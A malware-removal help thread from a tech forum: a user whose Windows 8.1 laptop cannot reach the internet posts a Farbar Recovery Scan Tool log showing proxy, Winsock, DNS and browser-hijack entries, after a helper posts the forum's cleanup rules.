Solved Virus won't let my laptop connect to internet

[hersheychoco]

I've already tried the proxy setting and I've already tried to reset my host file. I scanned my computer at first and ASC was able to stop the virus from blocking my firewall settings so I was able to change them but I still cannot connect to the internet. Please someone help, I need this laptop for school

 

[Broni]

Welcome aboard

Please, complete all steps listed here: https://www.techspot.com/community/...lware-removal-preliminary-instructions.58138/
Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
Attached logs won't be reviewed.

Please, observe following rules:

• Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
• If you're stuck, or you're not sure about certain step, always ask before doing anything else.
• Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
• Never run more than one scan at a time.
• Keep updating me regarding your computer behavior, good, or bad.
• The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
• If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
• I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

 

[hersheychoco]

FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
Ran by hersheychoco9 (administrator) on CHOCOYAUTJA (05-01-2016 17:08:26)
Running from D:\Utilities
Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse
(Paltiosoft Inc.) C:\Program Files (x86)\SoftDenchi\UCManSvc.exe
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\System32\SkyDrive.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\WINDOWS\System32\InputMethod\JPN\JpnIME.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Intel Corporation) C:\WINDOWS\System32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\System32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\System32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\System32\igfxpers.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSAgent.rse
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Wondershare) C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\Roboscan.rse
(Microsoft Corporation) C:\WINDOWS\System32\SettingSyncHost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
() C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\wbem\WmiPrvSE.exe
() C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSShell.rse

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7506648 2013-12-27] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1374424 2014-01-09] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5789512 2014-01-15] (Dell Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [Roboscan] => c:\program files\roboscan\roboscan\RSLaunch.exe [257856 2013-11-18] (Roboscan Inc)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508104 2015-09-04] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [CCleaner Monitoring] => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner64.exe [8418584 2015-07-17] (Piriform Ltd)
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-28] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [] => 0
HKU\S-1-5-18\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2015-10-29]
ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Roboscan Internet Security [2014-10-10] ()
Startup: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2015-05-14]
ShortcutTarget: Curse.lnk -> C:\Users\hersheychoco9\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
BootExecute: autocheck autochk * bootroboscan.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9-x64 01 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 03 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 04 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 16 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [DhcpNameServer] 75.75.76.76 75.75.75.75

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll [2015-09-21] (IObit)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-06] (Oracle Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default
FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2015-09-17] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-06] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2015-09-17] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF user.js: detected! => C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\user.js [2015-12-29]
FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found

Chrome:
=======
CHR Profile: C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-28]
CHR Extension: (Google Drive) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-28]
CHR Extension: (YouTube) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-28]
CHR Extension: (Google Search) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-28]
CHR Extension: (Gmail) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-28]
CHR Extension: (Pool Component) - C:\Users\hersheychoco9\AppData\Local\Pool Component\Component [2016-01-05]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-23] (Adobe Systems Incorporated)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
S2 AdvancedSystemCareService8; D:\Utilities\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [139328 2014-02-19] (Aviata, Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-18] (Intel Corporation)
R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2909472 2015-07-29] (IObit)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
R2 Roboscan_RTSrv; C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse [439104 2013-11-18] (Roboscan Inc)
R2 Roboscan_UpdSrv; C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse [842048 2013-11-18] (Roboscan Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1924328 2014-09-18] (SoftThinks SAS)
R2 UCManSvc; C:\Program Files (x86)\SoftDenchi\UCManSvc.exe [241808 2010-03-12] (Paltiosoft Inc.) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [356352 2015-09-23] (Wondershare) [File not signed]
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [656664 2014-08-19] (Wacom Technology, Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)
S2 NetprotAdp; no ImagePath
S2 SushiLeadsUpdaterService; no ImagePath
S2 Update Simple for You; no ImagePath
S2 WajaNetEn Monitor; no ImagePath
S3 WsDrvInst; no ImagePath

 

[hersheychoco]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131328 2014-10-08] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32768 2014-10-08] (Microsoft Corporation)
R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
S3 DDDriver; C:\Windows\system32\drivers\DDDriver64Dcsa.sys [23760 2015-01-30] (Dell Computer Corporation)
S3 DellProf; C:\Windows\system32\drivers\DellProf.sys [23312 2015-01-30] (Dell Computer Corporation)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-19] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-29] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100824 2013-12-18] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3607520 2013-10-14] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 RoboFww; c:\program files\roboscan\roboscan\plugin\realtime\RoboFww.sys [35616 2013-11-18] (Roboscan Inc)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [41200 2014-01-16] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 WinRing0_1_2_0; C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [14544 2010-11-01] (OpenLibSys.org)
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
S1 cherimoya; system32\drivers\cherimoya.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-05 17:08 - 2016-01-05 17:08 - 00000000 ____D C:\FRST
2015-12-29 16:23 - 2015-12-29 16:23 - 00806882 _____ C:\Users\hersheychoco9\Desktop\UsbFix_Report.txt
2015-12-29 16:11 - 2015-12-29 16:11 - 00002860 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-12-29 16:06 - 2015-12-29 16:06 - 18823680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2015-12-29 16:06 - 2015-12-29 16:06 - 15159296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2015-12-29 16:06 - 2015-12-29 16:06 - 02476376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2015-12-29 16:06 - 2015-12-29 16:06 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2015-12-29 16:05 - 2015-12-29 16:24 - 00000000 ____D C:\Users\hersheychoco9\Desktop\Utilities
2015-12-29 16:05 - 2015-12-29 16:05 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2015-12-29 16:05 - 2015-12-29 16:05 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2015-12-29 16:05 - 2015-12-29 16:05 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2015-12-29 16:04 - 2015-12-29 16:04 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 01201664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2015-12-29 16:04 - 2015-12-29 16:04 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2015-12-29 16:04 - 2015-12-29 16:04 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2015-12-29 16:02 - 2015-12-29 16:02 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 01091072 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00790528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00672984 _____ (Microsoft Corporation) C:\Windows\system32\MDMAgent.exe
2015-12-29 16:02 - 2015-12-29 16:02 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.Handlers.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00273240 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
